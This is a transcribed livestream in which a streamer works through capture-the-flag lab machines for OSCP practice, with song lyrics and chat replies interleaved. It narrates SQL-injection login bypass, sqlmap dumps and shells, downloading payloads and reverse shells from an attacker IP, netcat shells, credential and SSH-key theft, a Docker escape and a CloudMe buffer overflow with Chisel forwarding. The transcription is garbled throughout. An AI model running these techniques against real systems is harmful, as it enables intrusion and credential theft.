Back on the box for the Monday. So I've done already some looking into the box to get it set up. The common name was tied to the admin page, which we got here. And in bypass fashion, we've got in. So it's vulnerable to SQL to bypass authentication and authorization controls. We also got an interesting file from FTP that was Docker toolbox that we ran strings on. And this was sitting in the FTP share on the machine. So now we had to figure out how to get user access. Yo, Sniper. So it's Apache running on PHP. What up, Challon? 12 active users. Send credentials to Tony. Update printer drivers. There's not a lot of whole else to go off of. Yo, Flash. Kudos, props. Yeah. So we've grabbed the subdomain already from the common name. We're on the dashboard. Now we need, there's nowhere to plug into really. Maybe we can see if we can find some versions. jQuery 3. Can we figure out what dashboard this is? Uplusion 23 is what it says in the corner. Okay, so that worked. We got in, and now we need to figure out how to pivot to the system. Let's go, Raggy. Yes, sir. Day 100. I had not, Sniper. I've been kind of off my phone and social media this weekend. Not really been paying attention to what's been going down. Alright, so if it's SQL to get access, maybe we have to use the login page to extract credentials? I mean, we have SSH running, even though it's a Windows box. And we know that it's some type of Docker container, because we got the Docker toolbox. Let's do Docker toolbox login. Docker toolbox login SSH. Is this the default TC user? SSH Docker. Ten 236 TC user doesn't like it. What port does Docker toolbox run on? I don't think we have 8080. We do not. We got 445. We don't have creds though for anything. I mean, I know I'm admin.
Been a while since I heard my own voice.
What is this user interface? We click edit, but there's nothing to edit. And this drop down menu doesn't work either. Developer Megacorp. I mean, I guess what we could do is like SQLMap. Let's open up Burp and catch this request. What if we just did that?
So much better at everything. Nice and clever in my chair. There's no compare. I adore you. Ooh, I adore you. I came first, but you're ahead beyond your years. People try to find
No parameters found for testing the provided data.
I adore you. Ooh, I adore you.
Rerun with forms. Yes, test that form. Looks like data backend, Postgres SQL. Yes. See if we can extract values to log in with. Yogak. Day 100.
Life just like a dancer. If I had my way, every day would be a prayer. When you pray, you're answered, you won't see. Life just like a dancer. If I had my way, every day would be a prayer. Ooh, I hold you.
Username is vulnerable. No. Alright, well we know that it's injectable. That's not showing us anything new. So let's do... -- users. Maybe we can enumerate usernames. So there's one user. Passwords. Okay, so we got a password. User share wordless rocky.txt. Okay, so the password is password. Alright. And the user is PostgreSQL. Alright. What if we do databases? What is the flag I'm looking for? We just do dump. Alright, so now we're just dumping the database and we're gonna see what we can achieve. We got admin, we have Postgres. Maybe it's not a reverse shell in. Maybe we just walk in with the password. Nano hash. And then let's do hashcat on hash. Well, we know the first one was MD4, I believe. MD5. So let's run this on 0, word list, user share, word list, rocky.txt. Alright, so really? So a hex to ASCII. That's not it, is it? Oh, it is. What? It's done this before. What if we do MD4? Show. Maybe not. I think I'm overthinking this. We have admin. Oh. I mean, could we SSH into that? SQL. 10, 2, 3, 6. And the password was just password. Okay. How to pivot not a system from the SQL bypass. Can we run this through Hashcracker? Gotta find some usernames. Not found. See, it's always getting to here, but that's just not. What port is SQLMap? Let's see what else we can enumerate. --DBS. Alright, so we got 3 databases. Alright, so let's set --D to public, because that's interesting. And then let's dump tables. users. Okay, so dash T users. Dump. Password, character, username. That's the admin password. Oh, it could be a pass the hash. My time. Who is the user on this? Send credentials to Tony. Maybe these are Tony's creds. Same one. So we have the username Tony, and there's the other admin. Jeez, these windows. Maybe we could SMB client. They do have a public one. 10 10 10 236. Dash U Tony. Password. SSH as Tony. And password is password. Nope. Interesting. Megalogistics.com. And what if we call this 900? Because it did like MD4. Why is it doing this? Hex to binary. So now if we do binary to text. Yo, Zibby. Able to hit 100% of the mock test of Splunk. What do you mean by that? And we know one password though. – 5985. Alright, let's do guided mode. So we still have that Docker toolbox available, but I'm not sure what we... What is it? Docker-toolbox.exe. What domain name provides a virtual host on the web server with a signing form? Admin.megalogistics.com. Did I spell just? Megalogistic. There we go. To do Splunk certs, I'm doing the learning they have. There's a mock quiz on each section with questions from 40 minutes of learning videos. What are the questions on, like query writing? Splunk's a lot of fun. I've enjoyed it. Can the login be bypassed without knowing valid credentials? Yes, the classic SQL or 1 equals 1. PostgreSQL. What is the flag in SQLMap that allows execution commands on the remote server? Really? So it's RCE through SQL. Okay. OS shell? Really? Okay. So let's go boom boom OS shell. Current working directory. Oh. So the command is os-shell. Oh. So, I mean, we have their password as well. Is there an easier way to log in? What port is in RM? 5985. Okay. Evil win RM. P equals password. User equals PostgreSQL. And this is 10, 10. 236. I don't know if this will work. Oh, Jesus, Sibby. It'd be pretty insane for them to cut you for not getting the cert. I mean, you've already been doing it. Why are they now just saying you gotta figure it out? What if we go CD users? Yes. Do ls-li. Oh, Tony. Okay. So let's do ls-li Tony. Let's see that SSH. Oh. No output. So Tony is our user. I thought it would be if I do, who am I? I'm Postgres. Okay, so what if we do SSH as Postgres? And we just say we're password. No. Oh, config. Let's cat that. Maybe we can get some credentials. Where's Postgres config?
Just that sweetness that break my heart. Just that sweetness that break my heart. That sweetness that in your heart. Just that sweetness that makes me try. Friends all tell me
We are already in the data directory.
they don't need to ask me why. Another reason that I feel so bad. Since the night you said goodbye, it's not the letter that you just don't write.
Oh, look at that. There's user.txt.
It's not the crying in the dead of night
What?
that keeps me waiting for you. Just that sweetness that makes my heart. Just that sweetness.
Alright, well then, this is awesome. Let's grab the SSH key. Let's cat. Retrieve. Okay, so So we can SSH in.
Another weekend's almost gone. It's not the letters that you just don't write. It's not the answers of you from there. It's not the crying in the depth of the night. Keeps me hanging on. Just be waiting for you. It's that sweet elation within your heart. It's just that sweet elation within your heart.
Interesting. So in this folder, what is our known host? So let's ChatGPT here. What our plan of attack is. This. Okay, so how can I make the known host file records these details? Can I use this to generate a new SSH key? And if we do cat etc host, doesn't have any rights. We got known. Can we make a directory in there?
Well, I think of you sometimes when shining through, where the sun comes shining through, where the sun comes shining through, where the sun comes shining through, where the sun
Yo, shut up. Okay. So let's say how to add ID underscore RSA key to SSH. Who owns also that user file? So we need to add an SSH ID RSA key. Or actually, let's just do this. Single line bash reverse shell. I don't know why we're making this harder than it needs to be, right? So let's do my IP, and let's do server, and let's do this. I think we're running on port 8000. We're saying that 10, 14, 20. Oh, we don't need a server. C-LVMD. Okay, so let's do this. nanorev.sh. We're going on 4443. 10, 10, 14, 8. 14, 20. Okay, so if we're going there, now let's do server. Let's do wget http 10, 10, 14, 20 on port 8000. Let's get rev.sh. Output file is going to be temp rev.sh. It doesn't want to work. I mean, we have the SSH folder. Oh, OS Pwn, really? $62. Alright, so we just see that in. Oh. Let's just use a default shell. Valid quote content. Okay. I mean, we had the shell. I think we just need to upload. And we see the user flag in the Postgres primary. Oh, right there, user.txt. If we try and cat that. Oh, it does work. Okay. Cool. Boom. Well, there's user. Money talk. .ssh directory. Known host. Known host folder. SSH. How can I add my system to known host folder? I mean, we got the password, which is password, I'm pretty sure, of this user. We just need to can we run just and there's no keys directory, so can we make our own one? Okay, so should we just do that? The key generate. Copy the public key. Day 100. Yes, sir, Suka. Yes. Yeah, we're still going for that, Suka. We got the 90-day running. Okay, so we have to generate the key pair. Let's do CD CTF. Actually, could I just run that? Oh, okay. So let's do make directory SSH / authorized keys. Oh, I want to use ID_RSA. Generate remotely, then add to remote server, then SSH in. Is this the right thing? No, I'm good, Suka. I'm just tired. I promise. All is well. I just don't know if that's gonna work. Bugged. So it's not working for me. Passwords. See, and then it pumps out this password for user Postgres. And we go to crack station. Nano hash. Hashcat hash. Says MD5 at the start. Let's see if this gets it. Okay, well. Okay, clear text password. It says password for user Postgres. It doesn't want to run now. It probably doesn't have interactive login, honestly. And we can't use wget either. Tony is a valid user on the machine. We know that. How are these guys getting to... Which we did. I mean, so we have a shell, but this is not a good shell. So that's why I'm curious about how can we get... Can we do this? $1420 and port 4446. It doesn't execute. What if we do this? Into temp shell.sh. Okay, so chmod plus x temp shell.sh. Now let's run temp shell.sh. What? Why did that not working? Did you go for the So it depends on when I am ready to take it. It'll probably end up being the OSCP Plus though. Like the OSCP Plus is just taking over for OSCP. So there's like when you go to take the OSCP, you're gonna have to take the OSCP Plus now. Why doesn't that want to work? Setting up SSH public key authentication. Bogon IP. I'm not sure. I've not heard of Bogon IP.
Welcome, Lexer.
Yo, appreciate it.
What's good?
What are you coming in?
Yeah.
Yeah, so we have unauthorized keys now. I believe we do. We do ls-la. Mm-hmm. Okay, so we need to move the public key over. So let's do cat. Into there and authorize. Oh shit, did I make a... Oh shoot, wait, hold on. We made a directory. We need to make a text file. We do cat. What? Good morning. Yeah, 100 days for streaming and going for the OSCP. Okay, so now we can do it. So let's touch authorized keys, which is a text file now. And then let's echo our keys into it. This is our public key. There we go. You should not be able to SSH to your account from that computer. Okay. I don't think this will work though. No, because we're not our own user. That's why. Okay, so I want to see how they're doing this. Google X walkthrough. How are they getting? Got that. Hash identifier. Okay, so you got the shell. Oh. Okay, so what we did differently was we did not include the parentheses. Well, we just copied that, but we should have. That's where we went wrong. This is where we went wrong. There we go. That's where we had messed up. So now let's upgrade our shell. And a lot of these HTTP boxes only have Python 3. So now that we have that set up, this is our And we also know that there's a dude named Tony And Tony's home directory is empty. So, with that being said, let's do CLNP server. And we'll go wget http 10.10.14.20 linpiece.sh. Curl works. So let's curl it instead. And then pipe that out to linpiece.sh. And now we can do chmod plus x linpiece.sh linpiece.sh. Sweet. Yeah, absolutely. Yo, Dante. Interesting. Postgres at test statement, update login, set password. So there's our Postgres and password equals password. Nice. Oh, and there are multiple web files, admin and HTML. There's mail. Writable log files. Unexpected en route. Oh, we're in a Docker container. We knew that though because of Docker toolkit. An I-9. Sounds pretty advanced. What do the processors go up to now? I am not versed in the hardware world, or well versed, I should say. But just from some general OSINT, it looks like you're in good hands. I feel like a bigger concern with running virtual machines would be your storage or CPU.
has got to know the wall. I'm aimless describing what I'm saying in it, but you persuade me to define what I'm saying in it. I want life from the sky with none of the pain of living it. Not afraid of heights, but I'm afraid of widths. Had your heart broken, you're making it stick. Taking a
So we're in the container. We gotta use the container to escape.
The sun comes shining through, where the sun comes shining through, where the sun comes shining through, where the sun comes shining through.
This is a good one. It's not showing anything. Where is Tony? Tony's not even on here. But Tony has a home directory, which makes me think Tony is running on the host.
creeping through the night.
Docker. A lot of Docker. Mount info.
As I look around, all I see is fragile hearts.
Container.
Hello, mate. I'm not gonna be here forever. Fuck it.
Alright, well, we also got this Docker toolbox. And I just...
Somewhere we all remain together.
Because we... Oh, this is interesting. Because we don't have Tony
Awkward.
on home in our Etsy
Dance against your will.
password. Tony is not on here. But we also have this. Is there anything in mail? Permission denied. Alright. 5432. Postgres, MySQL, connect from CLI, PSQL. Oh shit, what happened? Command not found. I mean, we have credentials again. PSQL. Information underscore schema dot tables. Oh, you're right. Select table underscore name from information underscore schema dot tables. It's a lot of nonsense. Brute force won't help you. I mean, we got to figure out here. We're in a Docker container, and we were given this random file also. Docker toolbox. I'm going to start making some food right now. I will be right back. But the mount info is open. Actually, let's try server. And we have Tony though. Alright, I'll be right back. Brute force won't help you. I'm not sure. In our database we're using as test. We need to always. Docker command not found. Cat docker env blank mount is blank, so we know we're in a Docker container. PSQL. Select column name from users. Select column name from information score schema columns where table name like users. Column users does not exist. Schema dot tables where table name like users. No, not that I know of. I haven't really changed anything. Really? Alright. Let's follow this then. See, what are the default password for the Docker user? See, we can't even find Docker toolbox. cd opt. Etsy. Could run strings on it. We could also do, instead of strings, we'll do stat. 2020. So it's an older version. So let's do Docker toolbox default creds. Docker machine boot to Docker root password. Docker switch user. Password TC user. So we need to escape with that. So run that rev shell. Docker dash machine command TC user. Yeah, we're in there. Oh. I mean, is this not the host? Docker get host IP. Maybe if this is the container, host will be 0.1, because that's how it is. So instead, if we're 0.2, this will be 0.1. Nice. SSH Docker SSH Docker TC user. One 172.17.0.1, which will be our host. What is the name of the file I can administrator? ID underscore RSA. Alright. No, we don't need that. We need Netcat. Where's our reverse shell? user Docker. Oh, what if it's Tony? What if we switch user root and go TC user? We can't SSH there. Sudo terminal will not be allocated to standard and permission denied, permission denied. Point 0.1. Interesting. So yeah, how do you even access that key though? We're still... That's why I'm so confused. Where is... Boot to Docker 4.14.154. Escape boot to Docker. So the idea is to jump to the host. Oh, Docker machine SSH. And it just doesn't want to work. Yo, Nat. There's users, default, there's Tony. Python 3 upgrade terminal. Or upgrade shell. Oh, jeez. And then we'll call her reverse shell again. Always. Here we go. So now we want to do Python 3. There we go. So we just had to upgrade our shell, and it will be TC user. Nice. SSH. Oh, really? environment. Oh, default access to C users. Oh, because it's on a Windows machine. Oh, the C drive. There's users, administrator. Creator. cd.ssh cat id underscore RSA. Okay, so now if we did nano id underscore RSA, chmod 600 on id RSA, and then let's do ssh administrator at there, and then we'll throw in id underscore RSA. Lovely. And we're in. Or what is it? Print on Windows? Print root.txt. Okay, let's open up PowerShell then. Let's do cat root.txt. There we go. Thank you, PowerShell. Just trying to figure out how to escape from that Docker Compose. This was not working earlier, and that's what was throwing me off because it wasn't a secure session. So once we upgraded, then we were live. That was interesting. SSHing into a Windows machine. Usually it's just when like WinRM. And we saw, we did uname-a, boot to Docker. And that's how we got here. Boot to Docker. And there was that Tony user again, but we wanted administrator, which is very nice. Windows boxes added again. Give that one a little medium. Alright, and we also got cables for the server, so we can run those and set that portion up. What up, Miguel? Who are you? I am Jack. I am trying my best. That is me. Let's close these down. Clear that. We're feeling anxious today. Let's start this one up. Alright, let me go check out the food. Jeez, that minute rate's aggressive. Alright. I also, last week somebody mentioned to run Nmap with sudo, which I thought before was only for doing UDP scanning, but it actually makes TCP scans a lot faster by using raw sockets, which I don't really understand yet, but from my understanding, it skips a bunch of layers in the whatever the TCP stack or the OSI model. So raw sockets are faster, which can be used with sudo. it says CTF. I'm buff. I guess it's like a pen test. I'm trying to find the flags. And finding the flag validates that you escalated privileges. CTF is nice.
Can I just stand there?
Alright. For a Windows box, there are not a lot of ports. Port 8080. It has OpenSSL, so it may be HTTPS. And then 7680. Pando Pub. It's just all walkthrough stuff. Oh, okay. Oh.
So much better than
Okay, so we got some parameters.
I see all the man share, there's no compare. I adore you. Ooh, I adore you. I can't fuck your hair. One door is people try not to find this thing involved.
Could run a dir search.
Ooh, I adore you.
We can try the classics. License. Oh, let's also do... We're forgetting about the low-hanging fruits. Profile. Version 291. Oh, upload. Parse error. So we know there's some type of file transfer facilities. need some unauthenticated RCE on gym management system. Access the upload PHP page as it does not check for authenticated sessions. Whoa, okay. Undefined index. So it goes here, upload. Suffers from RC around rogue attackers. By adding a double extension. Interesting. Okay. So let's do nano rev.py, revh.py. chmod plus x revh. Oh, it's Python 2. I mean, it looks like we can just upload and execute. So let's do this. Let's echo blanks into it. Oh, wait. Okay. So let's do Python 3. Wait, what would it say? HTTP 10.10.10.198 port 8080. Really? Okay. We are in. That doesn't work because we're in Windows. So this is just a web session. Let's see if PowerShell turned on. Windows one-liner rev shell. Let's do this. We have Windows web app reverse shell. Give me a one-liner command for Windows machine to launch a rev shell back to my Kali. Because it's not going to be bash. It's probably going to be PowerShell, yeah. And let's edit this. Jeez. Alright. 10, 10, 14, 20. Listening on 4446. Let's edit this reverse shell. We gotta upgrade this. PHP rev shell. So it's PHP. I mean, we could probably just upload this ourselves. Dolus. I have not. Damn, Dea. I'm sorry, dude. It's a tough start to the week. Remember, she's broke, you're up. See, it's this shitty web shell. I mean, could I just launch server? this gonna work? Ten, 14, 20. Port 8000 ID underscore RSA. Yep. Where does it push this out to? Oh. RCE equals, who am I? That's great. CD. Actually, we'll do PowerShell. LS. Home. Or LS. Users. Why does that one work? Now this doesn't want to work? It would be interesting to see a video about Dolus and how you can implement it in different ways. Extra security on device using an anti-cheat to catch cheaters. I see what you're saying. What I'm not understanding is... Jeez, okay. PowerShell. PowerShell is not working because... Okay, so that worked. Can we modify? Shell. Okay, so let's do PHP reverse shell. Yeah, Pirate Software is awesome. He's got great content. He truly is a beast. Reverse shell single liner. So let's do this instead of a web reverse shell, we'll just ten, 14, 20. 1, 2, 3, 4. Does this work? let's just do this. Fix this payload. It's a PHP rev shell for Windows machine to connect back to my code. Add bash will work versus Windows. That cheats people are making nowadays in the current back and forth between anti-cheat devs and game cheat devs. Yeah. I mean, I've been following the Rocket League bots for a minute, and they are very impressive with how far they've actually gone. I mean, they're literally beating professionals, and it's bots. Is that right? Maybe there's a better... Oh, okay, so there is an MSO. Okay, that'll be easier. I mean, that's kind of the goal, is to get it to a Metasploit shell anyways. So this is very nice of them to create this. Oh. They have to include it. So it looks like we just upload oh, the ID is the shell name. And it uploaded that shell name. So it posts to the upload path right here. It's inevitable in future security encoding will more likely have an AI coworker to help speed up your process. That is true. What up, particular? Or particle? Particle you? What up? Okay, so it doesn't mind that, but What if we do this? We say modify this, so instead of web shell, we call back using PHP my. Let's see what's there. Slightly concerning. This? Okay. 1, 2, 3, 4. So exit, unsee. No! What happened? It's not holding. It did not like that. So we have the shell there. It's a power shell. See users. Sean. That's who we need. GG. PowerShell. C. Users. Sean. Oh no. PowerShell ls. C. Drive users. We need like SSH. Why did that work? PowerShell. Okay, so now let's take this, grab us a piece of paper and say user is Sean. Documents, views of docs. Desktop. Nice. So let's do PowerShell cat desktop user.txt user flag. Hello. Thank you. Thank you. Persistent listener And yeah, you're saying that on my side, Nat? Alright, alright. We could try that again. Let's do copyrevh.py, call it net.py. Net.py. Let's get rid of shell. We'll put back in our original code, our port 1, 2, 3, 4. Now let's do Python 3 like that, but it will be net.py. It's not persisting. It's connecting though. Interesting. Oh, Jesus. There we go. I mean, could we do PowerShell? Actually, let's do this. PowerShell from working directory. Maybe we could curl a reverse shell. So let's do MSF Venom. Actually, let's do this. Create MSF Venom Windows reverse shell. Not Metasploit or not Metapeter. Yeah, well, we're not in MSF console right now. Ideally, this is going to work. And we'll have shell.exe, and then we'll do server, and we'll say PowerShell wget http 10.10.14.20 port 8000 shell.exe out file shell.exe. Just like that. So now we're gonna do shell.exe PowerShell shell.exe. PowerShell boom shell.exe. Where is it? This was on Windows. Where did it output it to? instead of this, let's go to users. Sean? Is that my name? Yeah, user Sean. Desktop. So now let's do PowerShell ls. Nice. Okay, so PowerShell. Shell.exe. Oops. Why isn't this running? Oh, trying to use commands like PHP to my block certain commands. And I'm Sean. But what was also interesting was I don't even know how we would connect in on it. Wireless on 1, 2, 3, 4. That was to try and catch a reverse shell. Windows upgrade web shell to reverse shell. See, this is, yeah, but we want, I don't specify my IP on here. It's already listening on my IP. Which is 10.10.14.20. I mean, it's grabbing these files. Oh, well, it's already included on the shell exe. We made it with MSF Venom. So output shell.exe. And that's what we were trying to execute. Do we have SSH on here? No, I mean, we barely even have. Yeah. And that's what we were calling right here, was executing. And it's not. Doesn't want to. I just really don't want to be doing this. From here. I don't even know if we can get a. How to run it. Oh, I like this. Start file, file path. I'm listening on 1, 2, 3, 4. Just doesn't like that. The exe is not executing. Okay, let's do PowerShell. get net user cribs. Windows PowerShell. Show cribs. Oh. Who am I backslash priv, not privs. Increase working set privilege. Increases. Okay. What up, Lauren? I'm good. We're trying to figure out. Let's escalate to root. Oh, awesome. PowerShell. Really? Okay. Let's do 10, 10, 10, or what am I? 10, 10, 14, 20. Report 4444. It's not running. Stream's good. We're staying busy. But not. Where are WinPs? Lovely. WinPs any.exe. So let's try running this. If this one's to run, we'll call this WinP.exe. PowerShell. My IP 10, 10, 14, 20. Confused because it's just worked before. Jesus, what just happened? Now it's just not grabbing it. Yeah, I've been trying to stream daily. Last week we streamed every day. Yeah, it's really whenever we get a chance to See now, what's wrong with this command? Okay, so that worked. What is the difference? And we'll put output to peas.exe. What? PowerShell. This is confusing me. Do we have WinPs in there? No. Copy WinPs, I need to shell.exe. Okay, so that works. So now it's running? Well, we can't see it? What do you do besides streaming? Work. What is going on with my audio? I like to go fishing. Fishing's a good time. I like when the audio cooperates. It's not right now, though. It's bugging. I don't know why it does this. It just switches. Completely on its own. There we go. Okay. Yeah, I know. Oh, good morning, Pete, also. Yeah, I just fixed that. I don't know why that happens. I'm also from the US. Okay, I mean, we got user. How are they getting this shell on it, though? User was very easy. But now, trying to upload a reverse shell. Let me see what they did. I want to see what shell they used. We tried the MSF, a regular. We find that the shell is not very useful as we cannot move around to other folders. Let's try to send netcat.exe to the target and use it to connect our Kali machine. Kali is located. Oh. Target needs color wget. Interesting. Okay. Shells. Let's do add subnode Windows. Upload NC.exe to Windows. Appreciate it, Pete. We've came a long way. so we're still gonna serve it. We're gonna do. Oh wait, web shells or downloads. Which one are they using? I mean, they're starting the server. I don't think they. Okay. Let's do. Oh, that's web shells, Windows resources, binaries. There we go. So let's cd here, and then let's start a server. And we use wget for everything, but we'll use curl. 10, 10, 14, 20 for 8,000 /nc.exe out file nc.exe. Okay, and now we're gonna do nclp 444444, so nc.exe 10, 10, 14, 20, 4, 4, 4, 4, 4, 4, 4. Dash E PowerShell. I did not know this was a valid method. I like that. Okay, so let's do locate nc.exe Kali, serve it using curl to remote Windows host. That's beautiful. This is good stuff. Curl it, grab it, output, execute. Dash E, I'm assuming, is environment flag. Massive progress. 100% agreed. We may need to. Yes, I will drop a link to the Discord. We don't want to bogart good community and resources. There you go. Ten days, 10 days. 10 days, 10 days, 10 days. Alright. So now let's also do That's not gonna work, is it? I want. Win peas any. Let's do 10, 14, 20, 8,000. Jeez. We need to fix this. And then -o is win.exe, or we'll do win-o. What? Alright, let's just do.
Two people on a carpet with
Let's
light
get rid of
around
all
the
of this
curtains.
then.
Two people
Now
from a
let's grab
circus on a
that.
flying carpet. Give me 1,001 nights to tell you this story.
There we go.
And then I'll help with the
That's
dishes.
serving up. That's a 200.
Like Solomon on green silk with the golden stitches from old and weathered art.
Yeah, dir. I keep forgetting that because without the PowerShell commands, it's like dir and then print to read files. With PowerShell
Don't stain your spotless mood.
makes it much more like
Same as from across the
Linux.
room. Your eyebrows look tidier. Your hair the sort of mess that takes hours. Pleasant sky at night on the ceiling. Desert island duvet plotter bearing in the sea. Two bedouin people just sharing out the tea. Two people on a carpet couldn't care for what's real.
Nice. Alright, so now let's do wino.exe.
With light around the curtains. Two people from a circus on a flying carpet. You're wiser than your years, but everything changes. And when it does, wise people refuse to.
It's not a pretty output though because it's not showing anything.
Tonight
Okay.
the wind is following your commands.
So let's do this.
Is it the Arabian
wino.exe.
aromas, or maybe it's the takeaway? Your eyes are
There we go. That's always a good marker of progress when the win or lin peas start firing off. You know by this point you probably got user flag. Or you're just trying to snipe out root.
taking you back to my loneliest thoughts. Lately my back has got to know the wall. I'm aimless describing what I'm saying in it. But you persuade
Computer
me to
name is
define
Buff.
what I'm saying in it.
Buff.
I want life from the sky, but none of the pain of living. Not afraid of heights, but I'm afraid.
Oh, we could check previous commands.
Taking apart everyone you dated since.
Windows 10 Enterprise. Yeah, the ASCII art's the best. I feel like all the really popular tools have a ASCII banner. It's like a rite of passage. Where are my history? Windows Defender. Oh, there is no PowerShell history file. Okay.
These are my friends. These are my friends. These are my friends. These are definitely my friends. My friends.
inside a container.
Fuck it.
NTLM.
Creeping through the night.
There's some printers.
One street to another. And as I look around,
Awesome. I will do that.
hello mate. I'm not gonna be here forever. Fuck it. You are my friend.
I did not get a
Something
family
we all
class.
made together. Their acceptance is making me feel a bit awkward. Let's dance again, shall we?
Let's go, Droid. Shout out Droid's living room. We're taking over. We're going nuclear. We're everywhere and anywhere. Dude, are we about to pwn root from the living room? Current user Sean. Built-in account for administrating. Current user ID Sean. We don't really have any interesting privileges. Administrators logged on. Batch. Some auto logon credentials were found.
Let's dance again, shall we?
Oh, my SQL. Possible DLL hijacking. We own everything. Handle owner is Sean. Sean. Jeez. These are all owned by me. What is owned by administrator? No modifiable services. Checking write permissions in path folder. example. Oh, unquoted and space detected. So we might be able to plug in a reverse shell there. Folder, start menu, program, startup, folder permission, authenticated users. This Windows Defender file. .3306, so there is MySQL. And it's only myself and administrator. That's interesting. Okay, so we have our NTL MV2 hash, but that doesn't really matter. Jeez. What did I just do? Print working directory. Dir. Okay. And we're back. Hazam. That should be PowerShell. Alright, I'll be right back. We have PowerShell, so we have LS. PHP session files. So here's our PrivS checklist for Windows. Our environment variables. Nothing really interesting. User info. Net user. Sean. I thought there was a processes and services. We're seeing MySQL a lot, but we're the only user. There's no one else to pivot to besides admin or system. HTTP. So PowerShell, Windows, OpenSSH. Side by side. Windows, PowerShell, enumerate running services. PowerShell. It's not letting us get service. Oh, it requires other privileges. Alright. Let's see. What is the name of an interesting binary inside Sean's home directory? I don't know. Let's find out. CD users. CD Sean. CD desktop. CD documents. Tasks.bat. Downloads. Oh. CloudMe. What is it? Why did this not come up on WinPiece? A buffer overflow POC. .1.112. That looks right. Start the CloudMe service and run the script. Okay, so let's do nano. What? Is this in Python? Search exploit CloudMe. It is Python. nanocloud.py. Okay, so now what if we did wget http 10.10.14.20 port 8000 / cloud.py -o cloud.py. Oh no. So let's do copy cloud.py to cloud.py. Python 3 cloud.py. Failed to run. How to exploit this? Run Python file from PowerShell. What localhost port is the above binary listening on? Windows, find port running certain service. Netstat dash, oh no. Okay, let's do this. How do I run this and see the service or name or what is running on the ports? One 135, 445, 80, 80, 76, 80. Three 306. Close wait. Netstat. Dash Banner. Oh. Task list. Cloud me. It's 10 days, 10 days. So the PID is 6708. The PID is 6708. How do I see what port that is running on? Oh, then we're just gonna, so netstat, find string 6708. What? Six 708 is not listed here. I really like the 4.0 model. I mean, they keep coming out with different versions, and it doesn't seem like it could get better, but it does. It takes a little longer than 4, but it's definitely been worth it. I mean, it's like comparing 4 to 3.5. Like, 4 is eons ahead of it. Right when you think they can't do any better, they figure it out. You can use that with a process list to confirm. Windows process list. And where's Shell, PowerShell? Where's CloudMe? Here it is, CloudMe. 6732. But it does not want to run. Why doesn't this want to show? Uh, 6732 is still blank. I mean, do we just run it? Okay, now it's running. So let's do netstat dash, you know. Five 608. That still doesn't want to show out. It's being sneaky. Five 180 4. Four 180 5608. Netstat dash ano. Right, I guess we could just take a guess. There's only 2 ports we see open, so 7680. What about 8080? Nope. What port does Claude listen on? 8888888. There we go. Has a buffer overflow. We're gonna guess it's 1.11.2 because that's the version we're running. Nice. Okay, so let's do search exploits. Alright, so exploit remotely. So it's listening on a port that's not open to us, so we have to execute this remotely. A remote port forward to our attacker machine. Oh, okay. Set up port forwarding. Do we have that in our notes? Port forwarding? Do we have SSH on here? No. We could do Chisel. Do we use Chisel to exploit this? CloudMe is running. Oh, -V. CloudMe. That uses port 8888. Yep, we validated. Since we can access it, we can use Chisel or Plink. Oh. Oh, okay, so we need to get Chisel for... Chisel... Would we be the client? Or would we be the server? Okay, so on Kali, we're the server. Reverse. Starts the chisel server on our Kali. Why reverse? Chisel reverse flag. Oh, it allows clients to initiate the connection to the server. Ah, okay. So from there, we need to get the Chisel exe for Windows. Yo, Raggy, what note taker do you use? I use Cherry Tree. Yes, nuts. Yeah, we did the netstat, ANO, and then the find string. Yeah, we ran that on. Nothing looks like it's even running locally. But we know it's running, and now we need Chisel Windows. Would it be AMD? Which version of Windows do they get? AMD 64. Okay. So let's do that, and then let's go to CD downloads. Gunzip, Chisel. Execute format, okay. So we have that. Where? LSLA grub chiz. Change the Windows version to the target. Okay, so let's do server. And then we'll do wget http 10.10.14.20 port 8000 / this out file chisel.exe. Yes, that is what we are currently doing. We're setting it up with Chisel. And then it'll be Chisel in client mode. And then it'll run it. R equals. What it does is forward Windows port 88888 to R Cali's port 88888. The first port after the R option is out of our Cali, and the second port is out of Windows. As you remember, port 901 is our triple server on which Cali will remain same. Okay. What's going on here? Nice. And so now we can do this. Okay, CD users CD Sean. What? Oh. CD downloads chisel. So now let's run chisel.exe, and we are connecting to 10, 10, 14, 20 on port 9001, and we are doing remote host, right, to localhost 8888. Oh, we gotta say client. That's what we gotta do. So it'll be this, and then specify client. There we go, connected. Alright, well now that we have that running, let us do this. CD tools, LSSLATR, Python 3, cloud.py. Oh, Jesus. Whew. Yo. Oh my gosh. Sure, Exploit Cloud. So let's do search exploits -m. So I think we're good to grab the local version and not remote because we're port forwarding. What? Oh, we have to change the MSF Venom payload. Payload with buff. Do we have to do import sys? Alright, and then it wants us to make a new payload. Cat shell.exe. Jeez, what? This is the fucking shell? Seriously? Cloud me exploit. I think this will work. Nano test. Py Python 3 test.py. Don't like that. Target is there. Target connect 888. Robo microphone. Huh. Oh, yeah. I don't know why this is happening. It's very bizarre. It just kicks. There we go. Alright. Thank you. Good catch. Good catch. The payload provided in this pack opens the display settings. So how are they doing this? Jeez. So executes a command. Oh. And we have NCEXE. Oh. I see. Okay, that's interesting. I think we do need to 10, 10, 14, 5. Yeah, we do need to. Interesting. So like that. Connects to port 880, sends this. Set a payload buff. Why is this one so confusing? B90, 85. 90. Sys is not defined. What are we doing differently? What up, Dev? Yeah, OPSEC. Always. Buff, overrun. Guess it doesn't really matter. Why isn't that working? How do we check? Oh, it's not working? But it should be. Oh. Shit. Where?
Just that sweet little spirit,
And then
just that sweet little spirit in my heart. That sweet little spirit in your heart. Just that sweet little spirit.
so we need to modify this.
Tell me that it looks so sad. They don't need to ask me why. Another reason that I feel so bad. Something I can say goodbye. It's not the letter that you just don't write. It's not the answer.
So we need to modify this to
It's not the crying in the dead.
say
Waiting for just that sweet
10, 10, 14. There we go. So now let's do Python. What?
I watch the street, I watch the radio. I don't need to turn it on. Another friend comes by and tries to say hello. Another weekend's almost gone.
Awesome.
But you just don't ride.
This just doesn't. What?
It's not the crying in the dead of the night. Keeps me hanging on, just waiting for it. It's that sweet mission.
